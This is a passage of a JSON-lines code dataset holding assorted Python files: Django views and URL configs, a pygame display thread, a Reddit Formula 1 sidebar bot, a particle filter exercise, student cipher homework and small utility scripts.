str(sequencestart+index) or ''\n indexed_title = title + separator + sequenced_index\n\n if self.StorageLevelTitleExists(indexed_title):\n title_exists_message = True\n message = _('Some titles already exist. 
'\n 'Those were not created to maintain the '\n 'uniqueness of titles.')\n self.context.plone_utils.addPortalMessage(message, 'warning')\n continue\n sl = _createObjectByType('StorageLevel', self.context, tmpID())\n sl.setTitle(indexed_title)\n sl.processForm()\n message = ('info', 'Changes saved.')\n self.context.plone_utils.addPortalMessage(_(message[1]), message[0])\n self.request.RESPONSE.redirect(self.context.absolute_url())\n return\n\n\nschema = ATFolderSchema.copy()\nclass StorageLevels(ATFolder):\n implements(IStorageLevels)\n displayContentsTab = False\n schema = schema\n\nschemata.finalizeATCTSchema(schema, folderish = True, moveDiscussion = False)\natapi.registerType(StorageLevels, PROJECTNAME)\n","sub_path":"bika/lims/controlpanel/bika_storagelevels.py","file_name":"bika_storagelevels.py","file_ext":"py","file_size_in_byte":7288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"241066789","text":"from django.conf.urls import include, url\nfrom . import views\n\nurlpatterns = [\n # Examples:\n # url(r'^$', 'coding.views.home', name='home'),\n # url(r'^blog/', include('blog.urls')),\n\n url(r'^$', views.kappa),\n url(r'^input.html$', views.input),\n url(r'^newinput$', views.newinput),\n url(r'^analyze$', views.analyze),\n]\n","sub_path":"kappa/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"4676420","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jul 24 10:24:38 2018\n\n@author: Vidyaa\n\"\"\"\n\n# There is something small that needs fixing. Can you spot it and fix it? (Hint, we only want A-Z and a-z)\n\nfor i in range(65,65+26*2+6):\n\tif ord(chr(i)) <= 90 or ord(chr(i)) >= 97:\n\t\tprint(i, \"equivalent to \",chr(i))\n\n# Make a function that prints A-Z and a-z\n\ndef alphabet():\n\tfor i in range(65,65+26*2+6):\n\t\tif ord(chr(i)) <= 90 or ord(chr(i)) >= 97:\n\t\t\tprint(i, \"equivalent to \",chr(i))\n\n\nalphabet()\n\n\n# Make a function that asks the user for a message, and turns it into a list of numbers. (It's a cypher ;)) \nLetter = [] \n\ndef cypher(message):\n\tfor letter in message:\n\t\tLetter.append(ord(letter))\n\treturn Letter\n\nmessage = input(\"Enter your secret message:\")\nLetter = cypher(message)\nprint(\"Its a SECRET WOO HOO... \", Letter)\n\n\n# Optional: Write a function that does a ceaser cypher (Google), ask the user a number, and shift their message by that number.\n\nLetter = [] \n\ndef cypher(message,rot):\n\n\tfor letter in message:\n\t\tif rot.lower() == 'left':\n\t\t\tLetter.append(ord(letter) - 3)\n\t\telif rot.lower() == 'right':\n\t\t\tLetter.append(ord(letter) + 3)\n\treturn Letter\n\nmessage = input(\"Enter your secret message: \")\nrot = input(\"Rotate left or right: \")\nLetter = cypher(message, rot)\nprint(\"Its a CEASER SECRET HAAH HAAH HAA... 
\", Letter)\n","sub_path":"Week 2/Week2_Day2_HW.py","file_name":"Week2_Day2_HW.py","file_ext":"py","file_size_in_byte":1357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"534672929","text":"import threading\nimport pygame\nimport Queue\nimport os\nfrom textwrap import *\nfrom pygame import time\n\nSLIDE = '__SLIDE__'\n\nimport settings\nif settings.CAMERA:\n\tfrom pygame import camera\n\nclass Video(threading.Thread):\n\tdef __init__(self, logger, queue, parent_queue):\n\t\tthreading.Thread.__init__(self)\n\t\tself.logger = logger\n\t\tself.logger.debug(\"Creating video...\")\n\t\tself.queue = queue\n\t\tself.parent_queue = parent_queue\n\t\tself.is_slide = False\n\t\tself.slide = None\n\n\t\tself.text = \"Welcome!\"\n\n\t\t# Setup screen\n\t\tpygame.init()\n\t\tself.clock = time.Clock();\n\t\tpygame.mouse.set_visible(False)\n\t\tself.width = settings.SCREEN_WIDTH\n\t\tself.height = settings.SCREEN_HEIGHT\n\t\tflags = 0 #pygame.DOUBLEBUF | pygame.HWSURFACE | pygame.FULLSCREEN\n\t\tself.screen = pygame.display.set_mode((self.width, self.height), flags)\n\t\tfont_size = settings.FONT_SIZE\n\t\tself.font = pygame.font.SysFont(settings.FONT, font_size, bold=1)\n\n\n\t\tif settings.CAMERA:\n\t\t\tcamera.init()\n\t\t\tcamera_size = (640,480)\n\t\t\tself.c = camera.Camera('/dev/video0', camera_size)\n\t\t\tself.c.start()\n\t\t\tself.surface = pygame.Surface(camera_size)\n\t\tself.bigSurface = None\n\t\tself.alert = False\n\n\t\tself.foregroundColor = pygame.Color(settings.FONT_COLOR)\n\t\tself.backgroundColor = pygame.Color(settings.BACKGROUND_COLOR)\n\t\tself.black = pygame.Color(0, 0, 0, 100)\n\t\tself.shadowShade = 0\n\n\t\tself.background_image = None\n\t\tif settings.BACKGROUND_IMAGE:\n\t\t\tself.background_image = pygame.image.load(settings.BACKGROUND_IMAGE)\n\t\tself.logger.debug(\"Video created\")\n\n\tdef blit_background(self):\n\t\tif not self.alert:\n\t\t\tif settings.CAMERA:\n\t\t\t\tif self.c.query_image():\n\t\t\t\t\tself.c.get_image(self.surface)\n\t\t\t\t\tself.surface = pygame.transform.flip(self.surface, True, False)\n\t\t\t\t\tself.bigSurface = pygame.transform.scale(self.surface, (self.width, self.height))\n\t\t\telse:\n\t\t\t\tself.bigSurface = pygame.Surface((self.width, self.height))\n\t\t\t\tself.bigSurface.fill(self.backgroundColor)\n\n\t\tif self.bigSurface != None:\n\t\t\tself.screen.blit(self.bigSurface, (0,0))\n\n\t\tif self.background_image:\n\t\t\tself.screen.blit(self.background_image, (0,0))\n\n\t\tif self.is_slide:\n\t\t\tself.screen.blit(self.slide, (0,0))\n\t\t\n\tdef truncline(self, text, font, maxwidth):\n\t\t\"\"\"Truncates a single line of text to given pixel size.\"\"\"\n\t\treal=len(text)\n\t\tstext=text\n\t\tl=font.size(text)[0]\n\t\ta=0\n\t\tdone=1\n\t\twhile l > maxwidth: \n\t\t\ta=a+1\n\t\t\tstext=text.rsplit(None, a)[0]\n\t\t\tl=font.size(stext)[0]\n\t\t\treal=len(stext)\n\t\t\tdone=0\n\t\treturn real, done, stext\n\t\t\t\n\tdef wrapline(self, text, font, maxwidth):\n\t\t\"\"\"Wraps text line by word by word into multiple lines to fit given pixel size.\"\"\"\n\t\tdone=0\n\t\twrapped=[]\n\t\t\n\t\twhile not done: \n\t\t\tnl, done, stext=self.truncline(text, font, maxwidth)\n\t\t\twrapped.append(stext.strip())\n\t\t\ttext=text[nl:]\n\t\treturn wrapped\n\n\tdef run(self):\n\t\twhile True:\n\t\t\t# Set frame rate\n\t\t\tself.clock.tick(30)\n\t\t\ttry:\n\t\t\t\ttry:\n\t\t\t\t\tmsg = self.queue.get_nowait()\n\t\t\t\t\tpriority = msg[0]\n\t\t\t\t\tline1 = msg[1]\n\t\t\t\t\tline2 = 
msg[2]\n\t\t\t\t\tself.is_slide = line2 == SLIDE\n\t\t\t\t\tif self.is_slide:\n\t\t\t\t\t\tfilename = line1\n\t\t\t\t\t\tself.slide = pygame.image.load(filename)\n\n\t\t\t\t\tself.alert = msg[3]\n\t\t\t\t\tself.text = line1 + ' ' + line2\n\t\t\t\t\tself.queue.task_done()\n\t\t\t\t\tt0 = time.get_ticks()\n\t\t\t\texcept Queue.Empty:\n\t\t\t\t\tFalse\n\t\t\t\t\t#self.logger.debug(\"Video queue empty\")\n\n\t\t\t\tself.blit_background()\n\n\t\t\t\tif not self.is_slide and self.text != None:\n\t\t\t\t\twrapped_text = self.wrapline(self.text, self.font, self.width)\n\t\t\t\t\t# center text vertically\n\t\t\t\t\tstart_y = (self.height - (len(wrapped_text) * self.font.get_linesize())) / 2 \n\t\t\t\t\tif self.alert:\n\t\t\t\t\t\tif settings.TEXT_EFFECT == 'blink':\n\t\t\t\t\t\t\tfor index, line in enumerate(wrapped_text):\n\t\t\t\t\t\t\t\ttextSurface = self.font.render(line, True, self.foregroundColor)\n\t\t\t\t\t\t\t\tself.shadowShade = (self.shadowShade + 3) % 255\n\t\t\t\t\t\t\t\tshadowColor = pygame.Color(self.shadowShade, self.shadowShade, self.shadowShade)\n\t\t\t\t\t\t\t\tshadow = self.font.render(line, True, shadowColor)\n\t\t\t\t\t\t\t\tpos = (1, start_y + index * self.font.get_linesize())\n\t\t\t\t\t\t\t\tshadowOffset = 3\n\t\t\t\t\t\t\t\tself.screen.blit(shadow, (pos[0]+shadowOffset, pos[1]+shadowOffset))\n\t\t\t\t\t\t\t\tself.screen.blit(textSurface, pos)\n\t\t\t\t\t\telif settings.TEXT_EFFECT == 'type':\n\t\t\t\t\t\t\tt0 = time.get_ticks()\n\t\t\t\t\t\t\tself.blit_background()\n\t\t\t\t\t\t\tfor index, line in enumerate(wrapped_text):\n\t\t\t\t\t\t\t\tfor caret in range(len(line)):\n\t\t\t\t\t\t\t\t\tcurrent_part = line[0:caret+1]\n\t\t\t\t\t\t\t\t\ttextSurface = self.font.render(current_part, True, self.foregroundColor)\n\t\t\t\t\t\t\t\t\tshadowColor = self.black\n\t\t\t\t\t\t\t\t\tshadow = self.font.render(current_part, True, shadowColor)\n\t\t\t\t\t\t\t\t\tpos = (1, start_y + index * self.font.get_linesize())\n\t\t\t\t\t\t\t\t\tshadowOffset = 3\n\t\t\t\t\t\t\t\t\tself.screen.blit(shadow, (pos[0]+shadowOffset, pos[1]+shadowOffset))\n\t\t\t\t\t\t\t\t\tself.screen.blit(textSurface, pos)\n\t\t\t\t\t\t\t\t\tpygame.display.update()\n\t\t\t\t\t\t\t\t\ttime.wait(80)\t\t\t\t\t\t\n\t\t\t\t\t\t\twhile(t0 + settings.ALERT_DISPLAY_TIME*1000 - time.get_ticks() > 0):\n\t\t\t\t\t\t\t\t# keep the display updated while we wait\n\t\t\t\t\t\t\t\tpygame.display.update()\n\t\t\t\t\t\t\t\tself.clock.tick(30)\n\t\t\t\t\telse:\n\t\t\t\t\t\tfor index, line in enumerate(wrapped_text):\n\t\t\t\t\t\t\ttextSurface = self.font.render(line, True, self.foregroundColor)\n\t\t\t\t\t\t\twidth = textSurface.get_width()\n\t\t\t\t\t\t\tshadowColor = self.black\n\t\t\t\t\t\t\tshadow = self.font.render(line, True, shadowColor)\n\t\t\t\t\t\t\tpos = ((self.width - width)/2, start_y + index * self.font.get_linesize())\n\t\t\t\t\t\t\tshadowOffset = 3\n\t\t\t\t\t\t\tself.screen.blit(shadow, (pos[0]+shadowOffset, pos[1]+shadowOffset))\n\t\t\t\t\t\t\tself.screen.blit(textSurface, pos)\n\n\n\t\t\t\tpygame.display.update()\n\t\t\t\t\n\t\t\t\tfor event in pygame.event.get():\n\t\t\t\t\tif event.type == pygame.QUIT or event.type == pygame.KEYDOWN and event.key ==pygame.K_q:\n\t\t\t\t\t\tself.logger.info(\"EXIT\")\n\t\t\t\t\t\tpygame.quit()\n\t\t\t\t\t\tos._exit(0)\n\t\t\t\t\tif event.type == pygame.KEYDOWN:\n\t\t\t\t\t\tif event.key == pygame.K_t:\n\t\t\t\t\t\t\tmsg = [1, settings.FAKE_TWEET, \"\", True]\n\t\t\t\t\t\t\tself.parent_queue.put(msg)\n\t\t\texcept Exception as e:\n\t\t\t\tself.logger.exception(\"Exception in video: \" + 
str(e))\n\n","sub_path":"video.py","file_name":"video.py","file_ext":"py","file_size_in_byte":5960,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"191252764","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('api', '0002_auto_20151113_1113'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='group',\n name='court',\n field=models.ForeignKey(null=True, related_name='groups', blank=True, to='api.Court'),\n ),\n ]\n","sub_path":"api/migrations/0003_auto_20151113_1246.py","file_name":"0003_auto_20151113_1246.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"213042115","text":"\"\"\"\nbyceps.metrics.application\n~~~~~~~~~~~~~~~~~~~~~~~~~~\n\nThis allows to provide the metrics in a separate application. This might\nbe desired for performance and/or security reasons.\n\nRun like this (inside a virtual environment)::\n\n $ DATABASE_URI=your-database-uri-here FLASK_APP=app_metrics flask run --port 8090\n\nMetrics then become available at `http://127.0.0.1/metrics`.\n\n:Copyright: 2014-2023 Jochen Kupperschmidt\n:License: Revised BSD (see `LICENSE` file for details)\n\"\"\"\n\nfrom flask import Flask\n\nfrom byceps.database import db\nfrom byceps.util.framework.blueprint import get_blueprint\n\n\ndef create_metrics_app(database_uri):\n \"\"\"Create the actual Flask application.\"\"\"\n app = Flask(__name__)\n\n app.config['SQLALCHEMY_DATABASE_URI'] = database_uri\n\n # Initialize database.\n db.init_app(app)\n\n blueprint = get_blueprint('monitoring.metrics')\n app.register_blueprint(blueprint, url_prefix='/metrics')\n\n return app\n","sub_path":"byceps/metrics/application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":949,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"236736290","text":"from collections import OrderedDict\nfrom os import path\n\nimport datetime\nimport HTMLParser\nimport json\nimport mysql.connector\nimport OAuth2Util\nimport praw\nimport re\n\ndef main():\n # Read configuration files\n dir = path.dirname(__file__)\n\n config_data = open(path.join(dir, \"config.json\"), \"r\")\n config = json.load(config_data)\n config_data.close()\n\n sessions_data = open(path.join(dir, \"schedule.json\"), \"r\")\n sessions = json.load(sessions_data, object_pairs_hook=OrderedDict)\n sessions_data.close()\n\n # Reddit login\n r = praw.Reddit(config['reddit']['user_agent'])\n o = OAuth2Util.OAuth2Util(r)\n o.refresh(force=True)\n\n if (\"mysql\" in config):\n # Connect to MySQL database\n cnx = mysql.connector.connect(\n user=config['mysql']['username'].encode(),\n password=config['mysql']['password'].encode(),\n host=config['mysql']['host'].encode(),\n database=config['mysql']['database'].encode(),\n buffered=True,\n collation='utf8_swedish_ci',\n charset='utf8'\n )\n\n postScheduledPosts(cnx, r)\n\n # Close the MySQL connection\n cnx.close()\n\n # Update the sidebar\n h = HTMLParser.HTMLParser()\n current_sidebar = r.get_subreddit(config['reddit']['subreddit']).get_settings()[\"description\"]\n current_sidebar = h.unescape(current_sidebar)\n new_sidebar = current_sidebar\n\n new_sidebar = setTag(\"countdown\", getCountdownTime(sessions), new_sidebar)\n 
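# Illustrative example (hypothetical sidebar text), showing what setTag below does:
#   setTag("countdown", "**Race**: 2D", "... [](/f1bot-countdown-s)old[](/f1bot-countdown-e) ...")
#   -> "... [](/f1bot-countdown-s)**Race**: 2D [](/f1bot-countdown-e) ..."
# (setTag re-inserts the invisible markers and adds a trailing space before the closing one).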
r.get_subreddit(config['reddit']['subreddit']).update_settings(description=new_sidebar)\n\n# Take a sidebar, find [](/f1bot-keyword-s)<*>[](/f1bot-keyword-e), replace with\n# [](/f1bot-keyword-s)[](/f1bot-keyword-e), return updated sidebar\ndef setTag(keyword, content, sidebar):\n p = re.compile('\\[\\]\\(\\/f1bot-'+keyword+'-s\\)(.*)\\[\\]\\(\\/f1bot-'+keyword+'-e\\)', re.IGNORECASE)\n\n if p.search(sidebar):\n for match in p.finditer(sidebar):\n sidebar = sidebar.replace(match.group(0), '[](/f1bot-'+keyword+'-s)'+content+' [](/f1bot-'+keyword+'-e)')\n return sidebar\n\n# Take session data, figure out what the next session is and return a formatted\n# string saying how much time is left until that session begins. If the session\n# is in progress, return a string stating that.\ndef getCountdownTime(sessions):\n lengths = {\n 'Practice 1': 90,\n 'Practice 2': 90,\n 'Practice 3': 60,\n 'Qualifying': 90,\n 'Race': 120\n }\n for event in sessions['2015']:\n for (session, time) in event['times'].items():\n sessiontime = datetime.datetime.strptime(time, '%Y-%m-%d %H:%M')\n sessionlength = datetime.timedelta(0, lengths[session]*60)\n timeleft = sessiontime - datetime.datetime.now()\n\n # If the event time hasn't passed\n if timeleft > datetime.timedelta():\n d = datetime.datetime(1,1,1) + timeleft\n if (timeleft < datetime.timedelta(hours=1)):\n return (\"**%s**: %dM\" % (session, d.minute))\n elif (timeleft < datetime.timedelta(hours=7)):\n return (\"**%s**: %dH %dM\" % (session, d.hour, d.minute))\n elif (timeleft < datetime.timedelta(days=7)):\n return (\"**%s**: %dD %dH\" % (session, d.day-1, d.hour))\n else:\n return (\"**%s**: %dD\" % (session, d.day-1))\n\n # If the event time has passed but the event isn't over\n if (timeleft + sessionlength) > datetime.timedelta():\n return (\"**%s**: Live!\" % (session))\n\n return \"\"\n\n# Take a database connection and a reddit login, figure out if there are rows in the f1_bot table that have a\n# scheduled time in the past and submit those posts to reddit according to the information in the table. 
If\n# the logged in user has moderator powers, distinguish, add flair, sticky and post a comment.\ndef postScheduledPosts(cnx, reddit):\n # Search for rows whose scheduled time is less than 300 seconds (5 minutes) away and not yet posted\n cursor = cnx.cursor()\n updateCursor = cnx.cursor()\n fetch_query = (\"SELECT id, subreddit, title, text, flair_text, flair_css FROM f1_bot WHERE (TIME_TO_SEC(TIMEDIFF(schedule, NOW())) < 300) AND (posted = 0)\")\n update_query = (\"UPDATE f1_bot SET posted=1 WHERE id=%(post_id)s\")\n cursor.execute(fetch_query)\n\n if (cursor.rowcount > 0):\n for (post_id, subreddit, title, text, flair_text, flair_css) in cursor:\n s = reddit.submit(subreddit, title, text=text)\n updateCursor.execute(update_query, {'post_id': post_id})\n cnx.commit()\n\n moderators = reddit.get_subreddit(subreddit).get_moderators()\n if any(x for x in moderators if x.name == reddit.user.name):\n s.set_flair(flair_text=flair_text, flair_css_class=flair_css)\n s.distinguish()\n s.sticky()\n s.add_comment('Please post streams and stream requests as a reply to this comment.')\n\n cursor.close()\n updateCursor.close()\n\nif __name__ == \"__main__\": main()\n","sub_path":"f1-bot.py","file_name":"f1-bot.py","file_ext":"py","file_size_in_byte":5119,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"100231506","text":"# -*- coding: utf-8 -*-\nfrom django.http import HttpResponse, Http404\nfrom django.db import connection\nfrom django.shortcuts import get_object_or_404, render, redirect\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.views.decorators.csrf import ensure_csrf_cookie\nfrom django.contrib import messages\nfrom django.contrib.auth.decorators import login_required\nfrom django.template import Template, Context, loader\nimport datetime\n@ensure_csrf_cookie\n\n\n\n\n@login_required(redirect_field_name='')\ndef forside(request):\n\n\t\twith connection.cursor() as c:\n\t\t\tif request.method == 'GET':\n\t\t\t\tc.execute(\"select id from auth_user\")\n\t\t\t\tusercount = len(c.fetchall())\n\n\t\treturn render(request, 'homepage/index.html', {\n\t\t\t\t'user_first_name': request.user.first_name,\n\t\t\t\t'user_last_name': request.user.last_name,\n\t\t\t\t'usercount' : usercount\n\t\t\t\t} )\n\n@login_required(redirect_field_name='')\ndef beskeder(request):\n\n\tif request.method == \"GET\":\n\t\twith connection.cursor() as c:\n\n\t\t\tc.execute(\"select id from auth_user\")\n\t\t\tusercount = len(c.fetchall())\n\n\t\t\tc.execute(\"select id from messages\")\n\t\t\tmessage = len(c.fetchall())\n\n\t\t\tc.execute(\"select messages.id, messages.sid, messages.rid, messages.message, messages.time_stamp, auth_user.first_name, c1.first_name from messages join auth_user on messages.sid = auth_user.id join auth_user c1 on messages.rid = c1.id ORDER BY time_stamp ASC\")\n\t\t\tdata = c.fetchall()\n\n\t\t\tc.execute(\"select * from auth_user\")\n\t\t\tdropdown = c.fetchall()\n\n\t\t\treturn render(request, 'homepage/beskeder.html', {\n\t\t\t\t\t'user_first_name': request.user.first_name,\n\t\t\t\t\t'user_last_name': request.user.last_name,\n\t\t\t\t\t'usercount' : usercount,\n\t\t\t\t\t'message' : message,\n\t\t\t\t\t'data' : data,\n\t\t\t\t\t'dropdown' : dropdown,\n\t\t\t\t\t} )\n\n\tif request.method == \"POST\":\n\t\twith connection.cursor() as c:\n\n\t\t\tsenderID = request.user.id # Get the sender's ID.\n\t\t\t#\n\t\t\tmessagesent = request.POST[\"message\"] # Get the entered message.\n\t\t\t#\n\t\t\treciever = request.POST[\"reciever\"] # Get the recipient's ID\n\t\t\t#\n\t\t\tc.execute(\"select id from messages\")\n\t\t\t#\n\t\t\tmid = (len(c.fetchall()) + 1)\t# Get the number of messages and add 1.\n\t\t\t#\n\t\t\t# # We don't need to pass a date, since it is filled in automatically!\n\t\t\tc.execute(\"insert into messages(id, sid, rid, message) values (%s, %s, %s, %s)\", [mid, senderID, reciever, messagesent])\n\t\t\tconnection.commit()\n\t\t\treturn redirect('/')\n\n\n\n\n\n@login_required(redirect_field_name='')\ndef traeningsprogrammer(request):\n\n\t\twith connection.cursor() as c:\n\t\t\tif request.method == 'GET':\n\t\t\t\tc.execute(\"select id from auth_user\")\n\t\t\t\tusercount = len(c.fetchall())\n\n\t\treturn render(request, 'homepage/traeningsprogrammer.html', {\n\t\t\t\t'user_first_name': request.user.first_name,\n\t\t\t\t'user_last_name': request.user.last_name,\n\t\t\t\t'usercount' : usercount\n\t\t\t\t} )\n\n@login_required(redirect_field_name='')\ndef medlemmer(request):\n\n\t\twith connection.cursor() as c:\n\t\t\tif request.method == 'GET':\n\t\t\t\tc.execute(\"select id from auth_user\")\n\t\t\t\tusercount = len(c.fetchall())\n\n\t\t\t\tc.execute(\"select first_name , last_name from auth_user\")\n\t\t\t\tallusernames = c.fetchall()\n\n\t\t\treturn render(request, 'homepage/medlemmer.html', {\n\t\t\t\t\t'user_first_name': request.user.first_name,\n\t\t\t\t\t'user_last_name': request.user.last_name,\n\t\t\t\t\t'usercount' : usercount,\n\t\t\t\t\t'allusernames' : allusernames,\n\t\t\t\t\t} )\n","sub_path":"homepage/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3314,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"292857427","text":"import os\nimport subprocess\n\nif __name__ == \"__main__\":\n # root_dir = r'D:\\workspace\\stockopr'\n # py = str(os.path.join(root_dir, 'venv', 'Scripts', 'python.exe'))\n root_dir = os.getenv('HOME') + '/workspace/stockopr'\n py = str(os.path.join(root_dir, 'venv', 'bin', 'python'))\n\n script = 'console.py'\n script_path = os.path.join(root_dir, script)\n print(py, script_path)\n print(os.path.exists(py), os.path.exists(script_path))\n\n os.environ['PYTHONPATH'] = root_dir\n # subprocess.Popen([py, script_path], creationflags=subprocess.DETACHED_PROCESS, cwd=root_dir)\n subprocess.Popen([py, script_path], cwd=root_dir)\n","sub_path":"toolkit/initenv/run_stockopr_console.py","file_name":"run_stockopr_console.py","file_ext":"py","file_size_in_byte":645,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"442650944","text":"import random\n\nimport numpy as np\nfrom common.Particle import Particle\nfrom common.ToolBox import distance_to_obstacle,update_coord_according_scale\nimport math\n\n\n\nclass Particle_Filter:\n\n NB_PARTICLES=200\n FIXED_PLANE_Y = 100\n increment = 0\n DISTANCE_ERROR = 2\n\n width=0\n height=0\n\n MOTION_PLANNER_MIN=-1\n MOTION_PLANNER_MAX=5\n\n SCALE_FACTOR=10\n \n obs_grid=[]\n particle_list=[]\n\n\n def __init__(self,width,height,obs_grid):\n self.width=width\n self.height=height\n self.obs_grid=obs_grid\n self.particle_list=self.getRandParticle(self.NB_PARTICLES,0,width,0,self.height)\n\n def resetParticle(self):\n self.particle_list = self.getRandParticle(self.NB_PARTICLES, 0, self.width, self.FIXED_PLANE_Y, self.FIXED_PLANE_Y)\n\n # ----------------------------------------------------------------------------------------------------------------\n # ----------------------------------------- COMPUTED RANDOM 
PARTICLES--------------------------------------------\n # ----------------------------------------------------------------------------------------------------------------\n def getRandParticle(self,nbr, start_x, max_x, start_y, max_y):\n particle_list = []\n ################################### \n ##### s\n ## nbr: number fo particles\n ## start_x: min x possible coordinate\n ## max_x: max x possible coordinate\n ## start_y: min y possible coordinate\n ## max_y: max y possible coordinate\n #####\n ## Use the Particle object to fill the list particle_list\n ##\n for x in range(nbr):\n particle_list.append(Particle(random.uniform(start_x,max_x),random.uniform(start_y,max_y),0.01,0.01))\n\n return particle_list\n\n # ----------------------------------------------------------------------------------------------------------------\n # ----------------------------------- UPDATE PARTICLE ACCORDING NEX POSE-----------------------------------------\n # ----------------------------------------------------------------------------------------------------------------\n def updateParticle(self,plane_pose, increment_y):\n # process particle according motion planning\n self.particle_list = self.motion_prediction(plane_pose, increment_y)\n\n current_distance_to_obstacle = distance_to_obstacle(plane_pose['x'], plane_pose['y'], self.obs_grid,self.width,self.height,self.SCALE_FACTOR)\n\n self.weightingParticle_list( current_distance_to_obstacle)\n\n\n # ----------------------------------------------------------------------------------------------------------------\n # -------------------------------------- MOTION PREDICTION AND RESAMPLING --------------------------------------\n # ----------------------------------------------------------------------------------------------------------------\n def motion_prediction(self, plane_pose, increment_y):\n new_particle_list = []\n choices = {}\n for i in range(len(self.particle_list)):\n choices[self.particle_list[i].id()] = self.particle_list[i].w\n\n ###################################\n ##### TODO\n ## self.particle_list: list of available particles\n ##\n #####\n ## Use the function self.weighted_random_choice(choices) returning\n # coordinate from a particle according a\n ## roulette wheel algorithm\n # Note that weighted_random_choice return a string containing coodinate x and y of the selected particle\n for i in range(len(self.particle_list)):\n coord = self.weighted_random_choice(choices)\n x_coord = int(coord.split('_')[0])\n y_coord = int(coord.split('_')[1])\n x_coord += int(random.gauss(1+self.increment,10))\n \n y_coord = plane_pose['y']\n y_coord += int(random.gauss(increment_y,10))\n\n new_particle_list.append(Particle(x_coord, y_coord,0.01,0.01))\n \n return new_particle_list\n\n # -------------------------------------------------------\n # ----------- SELECT PARTICLE -----------\n # -------------------------------------------------------\n def weighted_random_choice(self,choices):\n ###################################\n ##### TODO\n ## choices: dictionary holding particle coordination as key\n ## and weight as value\n ## return the selected particle key\n #####\n\n id_particle = random.choices(list(choices.keys()), weights = list(choices.values()), k = 1)[0]\n for x in self.particle_list:\n if x.id() == id_particle:\n coord = \"{}_{}\".format(int(x.x),int(x.y))\n \n return coord\n\n # ----------------------------------------------------------------------------------------------------------------\n # --------------------------------------------- 
EVALUATE PARTICLE (proba) ---------------------------------------\n # ----------------------------------------------------------------------------------------------------------------\n def weightingParticle_list(self,observed_distance):\n sum_weights = 0\n for i in range(len(self.particle_list)):\n #Compute individual particle weight\n current_weight = self.weightingParticle(self.particle_list[i].x, self.particle_list[i].y, observed_distance)\n self.particle_list[i].w = current_weight\n sum_weights += current_weight\n for i in range(len(self.particle_list)):\n if sum_weights != 0:\n #compute proba sucha as weight is normalized\n self.particle_list[i].proba = self.particle_list[i].w / float(sum_weights)\n else:\n self.particle_list[i].proba = 0\n\n\n # -----------------------------------------------------\n # ----------- EVALUATE PARTICLE (Weight) -----------\n # -----------------------------------------------------\n def weightingParticle(self,p_x, p_y, observed_distance):\n ###################################\n ##### TODO\n ## p_x: x coordinate of the particle p\n ## p_y: y coordinate of the particle p\n ## observed_distance: distance to the ground\n ## measure by the probe\n ##\n ## return weight corresponding to the given particle\n ## according observation\n ##\n ## Note ue the function distance_to_obstacle to get the\n ## estimate particle to the ground distance\n particle_height = distance_to_obstacle(p_x, p_y, self.obs_grid, self.width,self.height, self.SCALE_FACTOR)\n\n ##Method 1\n # const = 0.3\n \n # if abs(particle_height-observed_distance) < const:\n # weight = 0.5\n # else:\n # weight = 0.1\n\n #Method 2\n mu = particle_height\n sigma = 1\n x = observed_distance\n weight = (1/(sigma*np.sqrt(2*np.pi))) * np.exp(-0.5*(((x-mu)/sigma)**2))\n\n return weight\n \n","sub_path":"particle_filter_student/scripts/Particle_Filter.py","file_name":"Particle_Filter.py","file_ext":"py","file_size_in_byte":7128,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"186527176","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.shortcuts import render, redirect,get_object_or_404\n\nfrom django.contrib.auth.decorators import login_required\nfrom Cotisation.models import *\nfrom datetime import date, timedelta\nfrom Comif.models import Client\n\n# Create your views here.\n\n\n@login_required(login_url=\"/\")\ndef index(request):\n user = get_object_or_404(Utilisateur, pk=request.user.pk)\n error = {}\n if request.method == 'POST':\n error = accept_formular(request, user, error)\n\n association_cotise = Cotisation.objects.filter(personne = user)\n comptes = Client.objects.filter(utilisateur = user)\n print(comptes)\n return render(request, 'client/client.html', locals())\n\n\ndef accept_formular(request, user, error):\n if request.FILES.has_key('photo'):\n user.photo = request.FILES['photo']\n \n if request.POST.has_key('pseudo') and request.POST['pseudo'] != \"\":\n users = Utilisateur.objects.filter(username = request.POST['pseudo'])\n if len(users) > 0 and users[0] != user:\n error['pseudo'] = \"Ce pseudo est déjà utilisé\"\n elif len(users) == 0:\n user.username = request.POST['pseudo']\n \n if request.POST.has_key('nom'):\n if request.POST['nom'] != \"\":\n user.last_name = request.POST['nom']\n else:\n error['nom'] = \"Le nom est obligatoire\"\n \n if request.POST.has_key('prenom'):\n if request.POST['prenom'] != \"\":\n user.first_name = request.POST['prenom']\n else:\n error['prenom'] = \"Le prénom est 
